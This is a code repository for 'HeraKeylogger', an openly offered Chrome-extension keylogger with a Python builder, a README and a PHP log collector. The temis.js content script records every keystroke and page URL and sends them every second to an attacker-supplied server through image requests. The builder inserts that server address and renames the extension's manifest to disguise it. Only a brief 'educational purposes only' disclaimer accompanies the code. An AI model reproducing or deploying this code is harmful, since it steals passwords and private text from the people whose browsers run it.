├── Images
├── .gitkeep
├── hera.png
├── sc.png
└── video.png
├── LICENSE
├── README.md
├── Template
├── icon128.png
├── icon16.png
├── icon48.png
├── manifest.json
└── temis.js
├── core
├── builder.py
├── pre.py
└── view.py
├── hera.py
├── hermes.php
└── requirements.txt
/Images/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Images/.gitkeep
--------------------------------------------------------------------------------
/Images/hera.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Images/hera.png
--------------------------------------------------------------------------------
/Images/sc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Images/sc.png
--------------------------------------------------------------------------------
/Images/video.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Images/video.png
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | BSD 3-Clause License
2 |
3 | Copyright (c) 2018, UndeadSec
4 | All rights reserved.
5 |
6 | Redistribution and use in source and binary forms, with or without
7 | modification, are permitted provided that the following conditions are met:
8 |
9 | * Redistributions of source code must retain the above copyright notice, this
10 | list of conditions and the following disclaimer.
11 |
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 | this list of conditions and the following disclaimer in the documentation
14 | and/or other materials provided with the distribution.
15 |
16 | * Neither the name of the copyright holder nor the names of its
17 | contributors may be used to endorse or promote products derived from
18 | this software without specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 |
5 | Hera Chrome Keylogger
6 |
7 | Post Exploitation Tool
8 |
9 |
10 | ### MAINTAINERS
11 | * **Alisson Moretto** |
12 | Twitter: @UndeadSec
13 | Github: @UndeadSec
14 |
15 | ### PREREQUISITES
16 |
17 | * Python 3.x
18 | * pip3
19 | * huepy from Python 3.x
20 | * PHP
21 | * sudo
22 |
23 | ### TESTED ON
24 | * **Kali Linux - Rolling Edition**
25 |
26 | * **Linux Mint - 18.3 Sylvia**
27 |
28 | * **Ubuntu - 16.04.3 LTS**
29 |
30 | * **MacOS High Sierra**
31 |
32 | ### CLONE
33 | ```
34 | git clone https://github.com/UndeadSec/HeraKeylogger.git
35 | ```
36 |
37 | ### RUNNING
38 |
39 | ```
40 | cd HeraKeylogger
41 | ```
42 |
43 | ```
44 | sudo apt-get install python3-pip -y
45 | ```
46 |
47 | ```
48 | sudo pip3 install -r requirements.txt
49 | ```
50 |
51 | ```
52 | python3 hera.py
53 | ```
54 |
55 | ### SCREENSHOT
56 | 
57 |
58 | ## DISCLAIMER
59 |
60 | TO BE USED FOR EDUCATIONAL PURPOSES ONLY
61 |
62 |
63 | The use of the HeraKeylogger is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.
64 |
65 | "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
66 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
67 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
68 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
69 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
70 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
71 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
72 | Taken from [LICENSE](LICENSE).
73 |
74 | ## Donation
75 | If you liked our work and want to support us, you can donate :D
76 |
77 | 
78 |
79 | Bitcoin Address: 1EmJ5KiAKzpyqGGHopAq9qukrVPS47T9bA
80 |
81 | ### VIDEO DEMO
82 |
83 |
84 | 
85 |
86 |
--------------------------------------------------------------------------------
/Template/icon128.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Template/icon128.png
--------------------------------------------------------------------------------
/Template/icon16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Template/icon16.png
--------------------------------------------------------------------------------
/Template/icon48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UndeadSec/HeraKeylogger/b74ea16fd07d21983bf4fe3bc3514c96f114ee0b/Template/icon48.png
--------------------------------------------------------------------------------
/Template/manifest.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "Extension Name",
3 | "description": "Extension Description",
4 | "version": "1.0",
5 | "permissions": [
6 | "activeTab"
7 | ],
8 | "browser_action": {
9 | "default_title": "Extension Default Title"
10 | },
11 | "content_scripts": [
12 | {
13 | "matches": [""],
14 | "js": ["temis.js"]
15 | }
16 | ],
17 | "manifest_version": 2,
18 | "icons": { "16": "icon16.png",
19 | "48": "icon48.png",
20 | "128": "icon128.png" }
21 | }
22 |
23 |
--------------------------------------------------------------------------------
/Template/temis.js:
--------------------------------------------------------------------------------
1 | var keys = '';
2 | var current = document.URL;
3 |
4 | new Image().src = url + '/hermes.php?c=[' + current + ']';
5 |
6 | document.onkeypress = function(e) {
7 | var get = window.event ? event : e;
8 | var key = get.keyCode ? get.keyCode : get.charCode;
9 | key = String.fromCharCode(key);
10 | keys += key;
11 | }
12 |
13 | window.setInterval(function(){
14 | if( keys != "" )
15 | new Image().src = url + '/hermes.php?c=' + keys + ' ';
16 | keys = '';
17 | }, 1000);
18 |
19 |
--------------------------------------------------------------------------------
/core/builder.py:
--------------------------------------------------------------------------------
1 | ######################################################
2 | # #
3 | # HeraChromeKeylogger #
4 | # #
5 | # by: UNDEADSEC #
6 | # #
7 | # Telegram Group: https://t.me/UndeadSec #
8 | # YouTube Channel: https://youtube.com/c/UndeadSec #
9 | # Twitter: https://twitter.com/A1S0N_ #
10 | # #
11 | ######################################################
12 | from json import load, dump
13 | from os import system
14 |
15 | def build(prefix, domain):
16 | with open('MaliciousExtension/temis.js', 'r+') as f:
17 | content = f.read()
18 | f.seek(0, 0)
19 | f.write('var url = \'' + prefix + domain + '\';' + '\n' + content)
20 |
21 | def editMan(newName, newDesc, newVersion):
22 | with open('MaliciousExtension/manifest.json', 'r+') as f:
23 | data = load(f)
24 | data['name'] = newName
25 | data['description'] = newDesc
26 | data['version'] = newVersion
27 | f.seek(0)
28 | dump(data, f, indent=4)
29 | f.truncate()
30 |
31 | def runServer():
32 | system("sudo php -S 127.0.0.1:80")
33 |
34 |
--------------------------------------------------------------------------------
/core/pre.py:
--------------------------------------------------------------------------------
1 | ######################################################
2 | # #
3 | # HeraChromeKeylogger #
4 | # #
5 | # by: UNDEADSEC #
6 | # #
7 | # Telegram Group: https://t.me/UndeadSec #
8 | # YouTube Channel: https://youtube.com/c/UndeadSec #
9 | # Twitter: https://twitter.com/A1S0N_ #
10 | # #
11 | ######################################################
12 | from os import system
13 |
14 | def checkPHP():
15 | if 256 != system('which php'):
16 | return True
17 | else:
18 | return False
19 |
20 | def pre():
21 | system('rm -rf MaliciousExtension')
22 | system('mkdir MaliciousExtension')
23 | system('cp Template/* MaliciousExtension/')
24 |
25 |
26 |
--------------------------------------------------------------------------------
/core/view.py:
--------------------------------------------------------------------------------
1 | ######################################################
2 | # #
3 | # HeraChromeKeylogger #
4 | # #
5 | # by: UNDEADSEC #
6 | # #
7 | # Telegram Group: https://t.me/UndeadSec #
8 | # YouTube Channel: https://youtube.com/c/UndeadSec #
9 | # Twitter: https://twitter.com/UndeadSec #
10 | # #
11 | ######################################################
12 | from os import system
13 | from huepy import *
14 |
15 | def clear():
16 | system('clear')
17 |
18 | def phpNot():
19 | print(red("\n\n[!] PHP installation not found. Please install PHP and run me again. http://www.php.net/ "))
20 |
21 | def head():
22 | clear()
23 | print(cyan('''
24 | UNDEADSEC | t.me/UndeadSec | youtube.com/c/UndeadSec - BRAZIL
25 |
26 | ██ ██ ████
27 | ██ ██ ██ ██ ██████
28 | ██████ ████ ████ ██ ██ v1.0
29 | ██ ██ ██ ██ ██████
30 | ██ ██ ████ ██ ██ ██ Twitter: https://twitter.com/UndeadSec
31 | CHROME KEYLOGGER
32 | EXTENSION'''))
33 |
34 | def printQue(text):
35 | print(que(text))
36 |
37 | def done():
38 | print(good('Done. Load your extension in Chrome. (/MaliciousExtension/)'))
39 | print(good('Your logs will be saved as logs.txt'))
40 |
41 |
42 | def checkEd():
43 | print(red(" [!] Do you agree to use this tool for educational purposes only? (y/N) "), end = '')
44 | if input('> ').upper() != 'Y':
45 | clear()
46 | print(red('\n[ YOU ARE NOT AUTHORIZED TO USE THIS TOOL ]\n'))
47 | exit(0)
48 |
49 | def end():
50 | clear()
51 | print(cyan('''
52 | ,-`{-`/
53 | ,-~ , \ {-~~-,
54 | ,~ , ,`,-~~-,`, ██ ██ ████
55 | ,` , { { } } ██ ██ ██ ██ ██████ }/
56 | ; ,--/`\ \ / / ██████ ████ ████ ██ ██ }/ /,/
57 | ; ,-./ \ \ { { ( ██ ██ ██ ██ ██████ /,; ,/ ,/
58 | ; / ` } } `, `-`-.___ ██ ██ ████ ██ ██ ██ / `, ,/ `,/
59 | \| ,`,` `~.___,---} CHROME KEYLOGGER / ,`,,/ ,`,;
60 | ` { { EXTENSION __ / ,`/ ,`,;
61 | / \ \ _,`, `{ `,{ `,`;`
62 | { } } /~\ .-:::-. (--, ;\ `,} `,`;
63 | \\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
64 | `-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
65 | / , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
66 | /~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
67 | /`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
68 | /` .`\ /` . ^ , ~ , . ` . ~\~ ascii by xiong
69 |
70 | > Watch us on YouTube: https://youtube.com/c/UndeadSec
71 | > Follow me on Twitter: https://twitter.com/A1S0N_
72 | > Contribute on Github: https://github.com/UndeadSec/HeraKeylogger
73 | > Join our Telegram Group(Portuguese Brazil): https://t.me/UndeadSec \n'''))
74 |
--------------------------------------------------------------------------------
/hera.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | ######################################################
4 | # #
5 | # HeraChromeKeylogger #
6 | # #
7 | # by: UNDEADSEC #
8 | # #
9 | # Telegram Group: https://t.me/UndeadSec #
10 | # YouTube Channel: https://youtube.com/c/UndeadSec #
11 | # Twitter: https://twitter.com/UndeadSec #
12 | # #
13 | ######################################################
14 |
15 | from sys import exit, version_info
16 |
17 | if version_info<(3,0,0):
18 | print('[!] Please use Python 3. $ python3 hera.py')
19 | exit(0)
20 |
21 | from core.view import *
22 | from core.pre import *
23 | from core.builder import *
24 |
25 | if checkPHP() == False:
26 | phpNot()
27 | exit(0)
28 |
29 | def main():
30 | printQue('Insert your server ip/domain:')
31 | domain = input(' > ')
32 | if 'https://' in domain:
33 | domain = domain.split('https://')[1]
34 | prefix = 'https://'
35 | elif 'http://' in domain:
36 | domain = domain.split('http://')[1]
37 | prefix = 'http://'
38 | else:
39 | prefix = 'http://'
40 | build(prefix, domain)
41 | printQue('Edit manifest informations (i.e: name) [y/n] ?')
42 | editManifest = input(' > ')
43 | if editManifest.upper() == 'Y':
44 | printQue('Insert a new name:')
45 | newName = input(' > ')
46 | printQue('Insert a new description:')
47 | newDesc = input(' > ')
48 | printQue('Insert a new version number:')
49 | newVersion = input(' > ')
50 | editMan(newName, newDesc, newVersion)
51 | done()
52 | printQue('Start local php server [y/n] ?')
53 | server = input(' > ')
54 | if server.upper() == 'Y':
55 | runServer()
56 |
57 |
58 | if __name__ == "__main__":
59 | try:
60 | clear()
61 | checkEd()
62 | head()
63 | pre()
64 | main()
65 |
66 | except KeyboardInterrupt:
67 | end()
68 | exit(0)
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/hermes.php:
--------------------------------------------------------------------------------
1 |
10 |
11 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | # view.py: 13
2 | huepy == 0.9.8.1
3 |
--------------------------------------------------------------------------------